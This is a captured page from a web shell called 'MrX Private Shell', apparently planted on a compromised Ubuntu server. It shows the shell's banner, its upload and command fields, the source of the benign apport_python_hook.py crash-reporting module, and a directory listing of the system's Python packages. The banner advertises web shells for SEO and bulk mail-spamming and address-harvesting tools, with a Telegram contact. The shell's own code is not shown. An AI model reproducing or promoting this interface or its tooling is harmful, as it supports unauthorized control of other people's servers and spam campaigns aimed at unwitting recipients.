__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
"""Python sys.excepthook hook to generate apport crash dumps."""

# Copyright (c) 2006 - 2009 Canonical Ltd.
# Authors: Robert Collins <[email protected]>
#          Martin Pitt <[email protected]>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.  See http://www.gnu.org/copyleft/gpl.html for
# the full text of the license.

import sys
import types

CONFIG = "/etc/default/apport"


def enabled():
    """Return whether Apport should generate crash reports."""
    # This doesn't use apport.packaging.enabled() because it is too heavyweight
    # See LP: #528355
    try:
        # pylint: disable=import-outside-toplevel; for Python startup time
        import re

        with open(CONFIG, encoding="utf-8") as config_file:
            conf = config_file.read()
        return re.search(r"^\s*enabled\s*=\s*0\s*$", conf, re.M) is None
    except OSError:
        # if the file does not exist, assume it's enabled
        return True


def apport_excepthook(
    binary: str,
    exc_type: type[BaseException],
    exc_obj: BaseException,
    exc_tb: types.TracebackType | None,
) -> None:
    # TODO: Split into smaller functions/methods
    # pylint: disable=too-many-branches,too-many-locals
    # pylint: disable=too-many-return-statements,too-many-statements
    """Catch an uncaught exception and make a traceback."""
    # create and save a problem report. Note that exceptions in this code
    # are bad, and we probably need a per-thread reentrancy guard to
    # prevent that happening. However, on Ubuntu there should never be
    # a reason for an exception here, other than [say] a read only var
    # or some such. So what we do is use a try - finally to ensure that
    # the original excepthook is invoked, and until we get bug reports
    # ignore the other issues.

    # import locally here so that there is no routine overhead on python
    # startup time - only when a traceback occurs will this trigger.
    # pylint: disable=import-outside-toplevel
    try:
        # ignore 'safe' exit types.
        if exc_type in (KeyboardInterrupt,):
            return

        # do not do anything if apport was disabled
        if not enabled():
            return

        try:
            import contextlib
            import io
            import os
            import re
            import traceback

            import apport.report
            from apport.fileutils import (
                increment_crash_counter,
                likely_packaged,
                should_skip_crash,
            )
        except (ImportError, OSError):
            return

        # for interactive Python sessions, sys.argv[0] == ""
        if not binary:
            return

        binary = os.path.realpath(binary)

        # filter out binaries in user accessible paths
        if not likely_packaged(binary):
            return

        report = apport.report.Report()

        # special handling of dbus-python exceptions
        if hasattr(exc_obj, "get_dbus_name"):
            name = exc_obj.get_dbus_name()
            if name == "org.freedesktop.DBus.Error.NoReply":
                # NoReply is an useless crash, we do not even get the method it
                # was trying to call; needs actual crash from D-BUS backend
                # (LP #914220)
                return
            if name == "org.freedesktop.DBus.Error.ServiceUnknown":
                dbus_service_unknown_analysis(exc_obj, report)
            else:
                report["_PythonExceptionQualifier"] = name

        # disambiguate OSErrors with errno:
        if exc_type == OSError:
            assert isinstance(exc_obj, OSError)
            if exc_obj.errno is not None:
                report["_PythonExceptionQualifier"] = str(exc_obj.errno)

        # append a basic traceback. In future we may want to include
        # additional data such as the local variables, loaded modules etc.
        tb_file = io.StringIO()
        traceback.print_exception(exc_type, exc_obj, exc_tb, file=tb_file)
        report["Traceback"] = tb_file.getvalue().strip()
        report.add_proc_info(extraenv=["PYTHONPATH", "PYTHONHOME"])
        report.add_user_info()
        # override the ExecutablePath with the script that was actually running
        report["ExecutablePath"] = binary
        if "ExecutableTimestamp" in report:
            report["ExecutableTimestamp"] = str(int(os.stat(binary).st_mtime))
        try:
            report["PythonArgs"] = f"{sys.argv!r}"
        except AttributeError:
            pass
        if report.check_ignored():
            return

        with contextlib.suppress(SystemError, ValueError):
            report.add_package_info()
        report["_HooksRun"] = "no"

        report_dir = os.environ.get("APPORT_REPORT_DIR", "/var/crash")
        try:
            os.makedirs(report_dir, mode=0o3777, exist_ok=True)
        except OSError:
            return

        mangled_program = re.sub("/", "_", binary)
        # get the uid for now, user name later
        pr_filename = f"{report_dir}/{mangled_program}.{os.getuid()}.crash"
        if os.path.exists(pr_filename):
            increment_crash_counter(report, pr_filename)
            if should_skip_crash(report, pr_filename):
                return
            # remove the old file, so that we can create the new one with
            # os.O_CREAT|os.O_EXCL
            os.unlink(pr_filename)

        with os.fdopen(
            os.open(pr_filename, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640), "wb"
        ) as report_file:
            report.write(report_file)

    finally:
        # resume original processing to get the default behaviour,
        # but do not trigger an AttributeError on interpreter shutdown.
        if sys:  # pylint: disable=using-constant-test
            sys.__excepthook__(exc_type, exc_obj, exc_tb)


def dbus_service_unknown_analysis(exc_obj, report):
    """Analyze D-Bus service error and add analysis to report."""
    # TODO: Split into smaller functions/methods
    # pylint: disable=too-many-locals
    # pylint: disable=import-outside-toplevel; for Python startup time
    import re
    import subprocess
    from configparser import ConfigParser, NoOptionError, NoSectionError
    from glob import glob

    # determine D-BUS name
    match = re.search(
        r"name\s+(\S+)\s+was not provided by any .service", exc_obj.get_dbus_message()
    )
    if not match:
        if sys.stderr:
            sys.stderr.write(
                "Error: cannot parse D-BUS name from exception: "
                + exc_obj.get_dbus_message()
            )
            return

    dbus_name = match.group(1)

    # determine .service file and Exec name for the D-BUS name
    services = []  # tuples of (service file, exe name, running)
    for service_file in glob("/usr/share/dbus-1/*services/*.service"):
        service = ConfigParser(interpolation=None)
        service.read(service_file, encoding="UTF-8")
        try:
            if service.get("D-BUS Service", "Name") == dbus_name:
                exe = service.get("D-BUS Service", "Exec")
                running = (
                    subprocess.call(["pidof", "-sx", exe], stdout=subprocess.PIPE) == 0
                )
                services.append((service_file, exe, running))
        except (NoSectionError, NoOptionError):
            if sys.stderr:
                sys.stderr.write(
                    f"Invalid D-BUS .service file {service_file}:"
                    f" {exc_obj.get_dbus_message()}"
                )
            continue

    if not services:
        report["DbusErrorAnalysis"] = f"no service file providing {dbus_name}"
    else:
        report["DbusErrorAnalysis"] = "provided by"
        for service, exe, running in services:
            report[
                "DbusErrorAnalysis"
            ] += f" {service} ({exe} is {'' if running else 'not '}running)"


def install():
    """Install the python apport hook."""
    # Record before the program can mutate sys.argv and can call os.chdir().
    binary = sys.argv[0]
    if binary and not binary.startswith("/"):
        # pylint: disable=import-outside-toplevel; for Python startup time
        import os

        try:
            binary = f"{os.getcwd()}/{binary}"
        except FileNotFoundError:
            try:
                binary = os.readlink("/proc/self/cwd")
                if binary.endswith(" (deleted)"):
                    binary = binary[:-10]
            except OSError:
                return

    def partial_apport_excepthook(
        exc_type: type[BaseException],
        exc_obj: BaseException,
        exc_tb: types.TracebackType | None,
    ) -> None:
        return apport_excepthook(binary, exc_type, exc_obj, exc_tb)

    sys.excepthook = partial_apport_excepthook

Filemanager

Name Type Size Permission Actions
Brlapi-0.8.6.egg-info Folder 0755
CommandNotFound Folder 0755
DistUpgrade Folder 0755
HweSupportStatus Folder 0755
LanguageSelector Folder 0755
Mako-1.3.8.dev0.egg-info Folder 0755
MarkupSafe-2.1.5.egg-info Folder 0755
NvidiaDetector Folder 0755
PIL Folder 0755
PyGObject-3.50.0.dist-info Folder 0755
PyJWT-2.10.1.dist-info Folder 0755
PyNaCl-1.5.0.dist-info Folder 0755
PyYAML-6.0.2.dist-info Folder 0755
Quirks Folder 0755
SSSDConfig Folder 0755
UbuntuDrivers Folder 0755
UpdateManager Folder 0755
__pycache__ Folder 0755
_yaml Folder 0755
apport Folder 0755
apt Folder 0755
apt_inst-stubs Folder 0755
apt_pkg-stubs Folder 0755
aptdaemon Folder 0755
aptdaemon-2.0.2.egg-info Folder 0755
aptsources Folder 0755
attr Folder 0755
attrs Folder 0755
attrs-25.1.0.dist-info Folder 0755
autocommand Folder 0755
autocommand-2.2.2.dist-info Folder 0755
babel Folder 0755
babel-2.17.0.egg-info Folder 0755
bcc Folder 0755
bcc-0.30.0.egg-info Folder 0755
bcrypt Folder 0755
bcrypt-4.2.0.dist-info Folder 0755
beautifulsoup4-4.13.3.dist-info Folder 0755
blinker Folder 0755
blinker-1.9.0.dist-info Folder 0755
bs4 Folder 0755
cairo Folder 0755
certifi Folder 0755
certifi-2025.1.31.egg-info Folder 0755
chardet Folder 0755
chardet-5.2.0.dist-info Folder 0755
click Folder 0755
click-8.1.8.dist-info Folder 0755
cloud_init-25.1.4.egg-info Folder 0755
cloudinit Folder 0755
configobj Folder 0755
configobj-5.0.9.dist-info Folder 0755
cryptography Folder 0755
cryptography-43.0.0.dist-info Folder 0755
cssselect Folder 0755
cssselect-1.3.0.egg-info Folder 0755
cupshelpers Folder 0755
cupshelpers-1.0.egg-info Folder 0755
dateutil Folder 0755
dbus Folder 0755
dbus_python-1.3.2.egg-info Folder 0755
debian Folder 0755
defer Folder 0755
defer-1.0.6.egg-info Folder 0755
distro Folder 0755
distro-1.9.0.dist-info Folder 0755
distro_info Folder 0755
distro_info-1.13.egg-info Folder 0755
duplicity Folder 0755
duplicity-3.0.4.egg-info Folder 0755
fasteners Folder 0755
fasteners-0.18.dist-info Folder 0755
gi Folder 0755
html5lib Folder 0755
html5lib_modern-1.2.egg-info Folder 0755
httplib2 Folder 0755
httplib2-0.22.0.dist-info Folder 0755
idna Folder 0755
idna-3.10.dist-info Folder 0755
inflect Folder 0755
inflect-7.3.1.dist-info Folder 0755
janitor Folder 0755
jaraco Folder 0755
jaraco.context-6.0.1.dist-info Folder 0755
jaraco.functools-4.1.0.dist-info Folder 0755
jinja2 Folder 0755
jinja2-3.1.5.dist-info Folder 0755
jsonpatch-1.32.egg-info Folder 0755
jsonpointer-2.4.egg-info Folder 0755
jsonschema Folder 0755
jsonschema-4.19.2.dist-info Folder 0755
jsonschema_specifications Folder 0755
jsonschema_specifications-2023.12.1.dist-info Folder 0755
jwt Folder 0755
language_selector-0.1.egg-info Folder 0755
launchpadlib Folder 0755
launchpadlib-2.1.0.dist-info Folder 0755
lazr Folder 0755
lazr.restfulclient-0.14.6.dist-info Folder 0755
lazr.uri-1.0.6.dist-info Folder 0755
louis Folder 0755
louis-3.32.0.egg-info Folder 0755
lxml Folder 0755
lxml-5.3.2.egg-info Folder 0755
mako Folder 0755
markdown_it Folder 0755
markdown_it_py-3.0.0.dist-info Folder 0755
markupsafe Folder 0755
mdurl Folder 0755
mdurl-0.1.2.dist-info Folder 0755
monotonic-1.6.egg-info Folder 0755
more_itertools Folder 0755
more_itertools-10.6.0.dist-info Folder 0755
nacl Folder 0755
netaddr Folder 0755
netaddr-1.3.0.dist-info Folder 0755
netifaces-0.11.0.egg-info Folder 0755
netplan Folder 0755
oauthlib Folder 0755
oauthlib-3.2.2.dist-info Folder 0755
olefile Folder 0755
olefile-0.47.egg-info Folder 0755
orca Folder 0755
paramiko Folder 0755
paramiko-3.5.1.egg-info Folder 0755
passlib Folder 0755
passlib-1.7.4.egg-info Folder 0755
pexpect Folder 0755
pexpect-4.9.0.egg-info Folder 0755
pillow-11.1.0.egg-info Folder 0755
pkg_resources Folder 0755
problem_report Folder 0755
psutil Folder 0755
psutil-5.9.8.dist-info Folder 0755
ptyprocess Folder 0755
ptyprocess-0.7.0.dist-info Folder 0755
pycairo-1.27.0.dist-info Folder 0755
pycups-2.0.4.dist-info Folder 0755
pygments Folder 0755
pygments-2.18.0.dist-info Folder 0755
pygtkcompat Folder 0755
pyparsing Folder 0755
pyparsing-3.1.2.dist-info Folder 0755
pyserial-3.5.egg-info Folder 0755
python_apt-3.0.0+ubuntu0.25.4.1.egg-info Folder 0755
python_dateutil-2.9.0.dist-info Folder 0755
python_debian-1.0.1+ubuntu1.dist-info Folder 0755
pyxdg-0.28.dist-info Folder 0755
referencing Folder 0755
referencing-0.35.1.dist-info Folder 0755
requests Folder 0755
requests-2.32.3.dist-info Folder 0755
rich Folder 0755
rich-13.9.4.dist-info Folder 0755
rpds Folder 0755
rpds_py-0.21.0.dist-info Folder 0755
serial Folder 0755
setuptools Folder 0755
softwareproperties Folder 0755
soupsieve Folder 0755
soupsieve-2.6.dist-info Folder 0755
speechd Folder 0755
speechd_config Folder 0755
ssh_import_id Folder 0755
ssh_import_id-5.11.egg-info Folder 0755
systemd Folder 0755
systemd_python-235.egg-info Folder 0755
typeguard Folder 0755
typeguard-4.4.2.dist-info Folder 0755
typing_extensions-4.12.2.dist-info Folder 0755
uaclient Folder 0755
ubuntu_drivers_common-0.0.0.egg-info Folder 0755
ubuntu_pro_client-8001.egg-info Folder 0755
ufw Folder 0755
ufw-0.36.2.egg-info Folder 0755
unattended_upgrades-0.1.egg-info Folder 0755
urllib3 Folder 0755
urllib3-2.3.0.dist-info Folder 0755
usb_creator-0.3.16.egg-info Folder 0755
usbcreator Folder 0755
validate Folder 0755
wadllib Folder 0755
wadllib-2.0.0.dist-info Folder 0755
webencodings Folder 0755
webencodings-0.5.1.egg-info Folder 0755
xdg Folder 0755
xkit Folder 0755
xkit-0.0.0.egg-info Folder 0755
yaml Folder 0755
_cffi_backend.cpython-313-x86_64-linux-gnu.so File 238.02 KB 0644
_dbus_bindings.cpython-313-x86_64-linux-gnu.so File 168.35 KB 0644
_dbus_glib_bindings.cpython-313-x86_64-linux-gnu.so File 22.57 KB 0644
apport_python_hook.py File 8.76 KB 0644
apt_inst.cpython-313-x86_64-linux-gnu.so File 58.74 KB 0644
apt_pkg.cpython-313-x86_64-linux-gnu.so File 355.67 KB 0644
brlapi.cpython-313-x86_64-linux-gnu.so File 341.15 KB 0644
command_not_found-0.3.egg-info File 189 B 0644
cups.cpython-313-x86_64-linux-gnu.so File 224.25 KB 0644
cupsext.cpython-313-x86_64-linux-gnu.so File 45.27 KB 0644
debconf.py File 7.87 KB 0644
distro_info.py File 20.54 KB 0644
hpmudext.cpython-313-x86_64-linux-gnu.so File 18.91 KB 0644
jsonpatch.py File 28.14 KB 0644
jsonpointer.py File 10.71 KB 0644
language_support_pkgs.py File 9.7 KB 0644
monotonic.py File 7 KB 0644
netifaces.cpython-313-x86_64-linux-gnu.so File 26.77 KB 0644
pcardext.cpython-313-x86_64-linux-gnu.so File 22.72 KB 0644
perf.cpython-313-x86_64-linux-gnu.so File 9.42 MB 0644
problem_report.py File 33.37 KB 0644
pysss.cpython-313-x86_64-linux-gnu.so File 35.82 KB 0644
pysss_murmur.cpython-313-x86_64-linux-gnu.so File 14.57 KB 0644
scanext.cpython-313-x86_64-linux-gnu.so File 27.43 KB 0644
typing_extensions.py File 131.3 KB 0644
uno.py File 16.84 KB 0644
unohelper.py File 10.7 KB 0644
xdg-5.egg-info File 201 B 0644
Filemanager